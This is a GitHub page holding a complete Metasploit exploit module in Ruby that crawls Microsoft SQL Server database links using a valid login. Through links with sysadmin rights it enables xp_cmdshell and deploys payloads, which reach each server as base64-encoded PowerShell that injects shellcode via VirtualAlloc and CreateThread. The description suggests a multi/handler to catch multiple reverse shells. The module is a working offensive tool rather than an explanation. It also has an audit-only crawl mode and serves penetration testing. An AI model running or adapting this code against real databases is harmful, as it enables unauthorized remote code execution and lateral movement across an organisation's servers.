-
Notifications
You must be signed in to change notification settings - Fork 6
/
mssql_linkcrawler-updates2.rb
executable file
·609 lines (525 loc) · 25.7 KB
/
mssql_linkcrawler-updates2.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report
#include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Database Link Crawling Command Execution',
'Description' => %q{
This module can be used to crawl MS SQL Server database links and deploy
Metasploit payloads through links configured with sysadmin privileges using a
valid SQL Server Login.
If you are attempting to obtain multiple reverse shells using this module we
recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
up a multi/handler to run in the background as a job with the "ExitOnSession" advanced
set to "false" to support multiple incoming shells.
If you are interested in deploying payloads to spefic servers this module also
supports that functionality via the "DEPLOYLIST" option.
Currently, the module is capable of delivering payloads to both 32bit and 64bit
Windows systems via powershell memory injection methods based on Matthew Graeber's
work. As a result, the target server must have powershell installed. By default,
all of the crawl information is saved to a CSV formatted log file and MSF loot so
that the tool can also be used for auditing without deploying payloads.
},
'Author' =>
[
'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
],
'Platform' => [ 'win' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
],
'Platform' => 'win',
'DisclosureDate' => 'Jan 1 2000',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']),
OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
OptString.new('PASSWORD', [true, 'The password for the specified username'])
], self.class)
end
def exploit
# Display start time
time1 = Time.new
print_status("-------------------------------------------------")
print_status("Start time : #{time1.inspect}")
print_status("-------------------------------------------------")
# Check if credentials are correct
print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")
if (not mssql_login_datastore)
print_error("Invalid SQL Server credentials")
print_status("-------------------------------------------------")
return
end
# Define master array to keep track of enumerated database information
master_list = []
master_list[0] = {} # Define new hash
master_list[0]["name"] = "" # Name of the current database server
master_list[0]["db_link"] = "" # Name of the linked database server
master_list[0]["db_user"] = "" # User configured on the database server link
master_list[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges
master_list[0]["db_version"] = "" # Database version of the linked database server
master_list[0]["db_os"] = "" # OS of the linked database server
master_list[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored
master_list[0]["done"] = "false" # Used to determine if linked need to be crawled
shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
# Setup query for gathering information from database servers
version_query = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
(ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT\
(char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\
CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 \
-charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \
master..sysservers where dataaccess=1 and srvname!=@@servername and providername like 'SQLOLEDB')as linkcount"
# Create loot table to store configuration information from crawled database server links
linked_server_table = Rex::Ui::Text::Table.new(
'Header' => 'Linked Server Table',
'Ident' => 1,
'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user',
'link_privilege', 'link_version', 'link_os','link_state','link_crawl_path']
)
save_loot = "false"
# Start crawling through linked database servers
while master_list.any? {|f| f["done"] == "false"}
# Find the first DB server that has not been crawled (not marked as done)
server = master_list.detect {|f| f["done"] == "false"}
# Get configuration information from the database server
sql = query_builder(server["path"].first,"",0,version_query)
result = mssql_query(sql, false) if mssql_login_datastore
parse_results = result[:rows]
parse_results.each { |s|
if (server["name"] == "" or server["name"] == nil)
server["name"] = s[0]
end
server["db_user"] = s[1]
server["db_sysadmin"] = s[5]
server["db_version"] = s[3]
server["db_os"] = s[4]
server["numlinks"] = s[6]
}
if master_list.length == 1
print_good("Successfully connected to #{server["name"]}")
if datastore['VERBOSE'] == true
show_configs(server["name"],parse_results,true)
elsif server["db_sysadmin"] == 1
print_good("Sysadmin on #{server["name"]}")
end
end
# Deploy shell
if !shelled.include?(name) #and server["name"] == master_list[0]["name"]
if server["db_sysadmin"] == 1 and datastore['deploy'] and (!(server["db_version"].match(/SQL\s*Server\s*2000/i)))
enable_xp_cmdshell(server["path"].first,server["name"],shelled)
end
end
# If links were found, determine if they can be connected to and add to crawl list
if (server["numlinks"] > 0)
# Enable loot
save_loot = "TRUE"
# Select a list of the linked database servers that exist on the current database server
print_status("")
print_status("-------------------------------------------------")
print_status("Crawling links on #{server["name"]}...")
# Display number db server links
print_status("Links found: #{server["numlinks"]}")
print_status("-------------------------------------------------")
execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and providername like 'SQLOLEDB'"
sql = query_builder(server["path"].first,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
result[:rows].each {|name|
name.each {|name|
# Check if link works and if sysadmin permissions - temp array to save orig server[path]
temppath = Array.new
temppath = server["path"].first.dup
temppath << name
# Get configuration information from the linked server
sql = query_builder(temppath,"",0,version_query)
result = mssql_query(sql, false) if mssql_login_datastore
# Add newly acquired db servers to the master_list, but don't add them if the link is broken or already exists
if result[:errors].empty? and result[:rows] != nil then
# Assign db query results to variables for hash
parse_results = result[:rows]
# Add link server information to loot
link_status = 'up'
report_link_path = "#{master_list.first["name"]} -> #{temppath.join(" -> ")}"
write_to_report(name,server,parse_results,linked_server_table,link_status,report_link_path)
# Display link server information in verbose mode
if datastore['VERBOSE'] == true
show_configs(name,parse_results)
print_status(" o Link path: #{master_list.first["name"]} -> #{temppath.join(" -> ")}")
else
if parse_results[0][5] == 1
print_good("Link path: #{master_list.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)")
else
print_status("Link path: #{master_list.first["name"]} -> #{temppath.join(" -> ")}")
end
end
# Add link to master_list hash
if !master_list.any? {|f| f["name"].downcase == name.downcase} #previously unless
# Action for new server
master_list << add_host(name,server["path"].first,parse_results)
else
# Add Existing
(0..master_list.length-1).each do |x|
if master_list[x]["name"].downcase == name.downcase
# Add addtional link crawl paths for known server
master_list[x]["path"] << server["path"].first.dup
master_list[x]["path"].last << name
# Deploy shell to box if not shelled
if !shelled.include?(name) #previously unless
if parse_results[0][2]==1 and datastore['deploy'] and (!(master_list[x]["db_version"].match(/SQL\s*Server\s*2000/i)))
enable_xp_cmdshell(master_list[x]["path"].last.dup,name,shelled)
end
end
#else
# break
end
end
end
else
# Add to report
link_status = 'Connection Failed'
report_link_path = "#{master_list.first["name"]} -> #{temppath.join(" -> ")}"
write_to_report(name,server,parse_results,linked_server_table,link_status,report_link_path)
# Display status to user
if datastore['VERBOSE'] == true
print_status(" ")
print_error("Linked Server: #{name} ")
print_error(" o Link Path: #{master_list.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
print_status(" Failure could be due to:")
print_status(" - A dead server")
print_status(" - Bad credentials")
print_status(" - Nested open queries through SQL 2000")
else
print_error("Link Path: #{master_list.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
end
end
}
}
end
# Set server to "crawled"
server["done"]="TRUE"
end
print_status(" ")
print_status("-------------------------------------------------")
# Setup table for loot
this_service = nil
if framework.db and framework.db.active
this_service = report_service(
:host => rhost,
:port => rport,
:name => 'mssql',
:proto => 'tcp'
)
end
# Display end time
time1 = Time.new
print_status("End time : #{time1.inspect}")
print_status("-------------------------------------------------")
link_has_sysadmin = 0
link_has_only_user = 0
master_list.each {|blah|
if blah["db_sysadmin"] == 1 then
#print_status("Sysadmin on #{blah["name"]}")
link_has_sysadmin = link_has_sysadmin+1
end
if blah["db_sysadmin"] == 0 then
#print_status("User on #{blah["name"]}")
link_has_only_user = link_has_only_user+1
end
}
print_status(" ")
print_status("-------------------------------------------------")
print_status("Crawl Summary")
print_status("-------------------------------------------------")
print_status("#{master_list.length} SQL Servers found")
print_status("#{link_has_sysadmin} with Sysadmin privs")
print_status("#{link_has_only_user} with user privs")
print_status("-------------------------------------------------")
# Write log to loot / file
if (save_loot=="TRUE")
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
print_status("Results have been saved to: #{path}")
end
end
# ---------------------------------------------------------------------
# Method that builds nested openquery statements using during crawling
# ---------------------------------------------------------------------
def query_builder(path,sql,ticks,execute)
# Temp used to maintain the original master_list[x]["path"]
temp = Array.new
path.each {|i| temp << i}
# Actual query - defined when the function originally called - ticks multiplied
if path.length == 0
return execute.gsub("'","'"*2**ticks)
# openquery generator
else
sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")"
return sql
end
end
# ---------------------------------------------------------------------
# Method that builds nested openquery statements using during crawling
# ---------------------------------------------------------------------
def query_builder_rpc(path,sql,ticks,execute)
# Temp used to maintain the original master_list[x]["path"]
temp = Array.new
path.each {|i| temp << i}
# Actual query - defined when the function originally called - ticks multiplied
if path.length == 0
return execute.gsub("'","'"*2**ticks)
# Openquery generator
else
exec_at = temp.shift
sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]"
return sql
end
end
# ---------------------------------------------------------------------
# Method for adding new linked database servers to the crawl list
# ---------------------------------------------------------------------
def add_host(name,path,parse_results)
# Used to add new servers to master_list
server = Hash.new
server["name"] = name
temppath = Array.new
path.each {|i| temppath << i }
server["path"] = [temppath]
server["path"].first << name
server["done"] = "false"
parse_results.each {|stuff|
server["db_user"] = stuff.at(1)
server["db_sysadmin"] = stuff.at(2)
server["db_version"] = stuff.at(3)
server["db_os"] = stuff.at(4)
server["numlinks"] = stuff.at(6)
}
return server
end
# ---------------------------------------------------------------------
# Method to display configuration information
# ---------------------------------------------------------------------
def show_configs(i,parse_results,entry=false)
print_status(" ")
parse_results.each {|stuff|
# Translate syadmin code
status = stuff.at(5)
if status == 1 then
dbpriv = "sysadmin"
else
dbpriv = "user"
end
# Display database link information
if entry == false
print_status("Linked Server: #{i}")
print_status(" o Link user: #{stuff.at(1)}")
print_status(" o Link privs: #{dbpriv}")
print_status(" o Link version: #{stuff.at(3)}")
print_status(" o Link OS: #{stuff.at(4).strip}")
print_status(" o Links on server: #{stuff.at(6)}")
else
print_status("Server: #{i}")
print_status(" o Server user: #{stuff.at(1)}")
print_status(" o Server privs: #{dbpriv}")
print_status(" o Server version: #{stuff.at(3)}")
print_status(" o Server OS: #{stuff.at(4).strip}")
print_status(" o Server on server: #{stuff.at(6)}")
end
}
end
# ---------------------------------------------------------------------
# Method for generating the report and loot
# ---------------------------------------------------------------------
def write_to_report(i,server,parse_results,linked_server_table,link_status,report_link_path)
parse_results.each {|stuff|
# Parse server information
db_link_user = stuff.at(1)
db_link_sysadmin = stuff.at(2)
db_link_version = stuff.at(3)
db_link_os = stuff.at(4)
#Fix connection failed data
if link_status == "Connection Failed" then
db_link_user = "NA"
db_link_sysadmin = "NA"
db_link_version = "NA"
db_link_os = "NA"
report_priv = "NA"
end
# Set privilege level language for user
if db_link_sysadmin == 0 then
report_priv = "USER"
end
# Set privilege level language for sysadmin
if db_link_sysadmin == 1 then
report_priv = "SYSADMIN!"
end
# Add link server to the reporting array and set link_status to 'up'
linked_server_table << [server["name"],server["db_version"],server["db_os"],
i,db_link_user,report_priv,db_link_version,db_link_os,link_status,report_link_path]
return linked_server_table
}
end
# ---------------------------------------------------------------------
# Method for enabling xp_cmdshell
# ---------------------------------------------------------------------
def enable_xp_cmdshell(path,name,shelled)
# Enables "show advanced options" and xp_cmdshell if needed and possible
# They cannot be enabled in user transactions (i.e. via openquery)
# Only enabled if RPC_Out is enabled for linked server
# All changes are reverted after payload delivery and execution
# Check if "show advanced options" is enabled
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
sao_orig = result[:rows].pop.pop
# Check if "xp_cmdshell" is enabled
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
xp_cmd_orig = result[:rows].pop.pop
# Try blindly to enable "xp_cmdshell" on the linked server
# Note:
# This only works if rpcout is enabled for all links in the link path.
# If that is not the case it fails cleanly.
if xp_cmd_orig == 0
if sao_orig == 0
# Enabling show advanced options and xp_cmdshell
execute = "sp_configure 'show advanced options',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
# Enabling xp_cmdshell
print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
execute = "sp_configure 'xp_cmdshell',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
# Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
xp_cmd_shell_now = result[:rows].pop.pop
if xp_cmd_shell_now == 1 or xp_cmd_orig == 1
print_status("\t - Enabled xp_cmdshell on " + name) if xp_cmd_orig == 0
if datastore['DEPLOY']
print_status("Ready to deploy a payload to #{name}")
if datastore['DEPLOYLIST']==""
datastore['DEPLOYLIST'] = nil
end
if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - Checking if #{name} is on the deploy list...")
end
if datastore['DEPLOYLIST'] != nil
deploylist = datastore['DEPLOYLIST'].upcase.split(',')
end
if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase
if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - #{name} is on the deploy list.")
end
unless shelled.include?(name)
powershell_upload_exec(path)
shelled << name
else
print_status("Payload already deployed on #{name}")
end
elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - #{name} is not on the deploy list")
end
end
else
print_error("\t - Unable to enable xp_cmdshell on " + name)
end
# Revert soa and xp_cmdshell to original state
if xp_cmd_orig == 0 and xp_cmd_shell_now == 1
print_status("\t - Disabling xp_cmdshell on " + name)
execute = "sp_configure 'xp_cmdshell',0;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
if sao_orig == 0 and xp_cmd_shell_now == 1
execute = "sp_configure 'show advanced options',0;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
end
# ----------------------------------------------------------------------
# Method that delivers shellcode payload via powershell thread injection
# ----------------------------------------------------------------------
def powershell_upload_exec(path)
# Create powershell script that will inject shell code from the selected payload
myscript ="$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
# Unicode encode powershell script
mytext_uni = Rex::Text.to_unicode(myscript)
# Base64 encode unicode
mytext_64 = Rex::Text.encode_base64(mytext_uni)
# Generate random file names
rand_filename = rand_text_alpha(8)
var_duplicates = rand_text_alpha(8)
# Write base64 encoded powershell payload to temp file
# This is written 2500 characters at a time due to xp_cmdshell ruby function limitations
# Also, line number tracking was added so that duplication lines caused by nested linked
# queries could be found and removed.
print_status("Deploying payload...")
linenum = 0
mytext_64.scan(/.{1,2500}/).each {|part|
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
linenum = linenum+1
}
# Remove duplicate lines from temp file and write to new file
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
# Remove tracking tags from lines
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
# If running on 64bit system, 32bit powershell called from syswow64
powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like '*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe -noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
powershell_uni = Rex::Text.to_unicode(powershell_cmd)
powershell_64 = Rex::Text.encode_base64(powershell_uni)
# Setup query
execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'"
sql = query_builder(path,"",0,execute)
# Execute the payload
print_status("Executing payload...")
result = mssql_query(sql, false) if mssql_login_datastore
# Remove payload data from the target server
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql,false)
end
end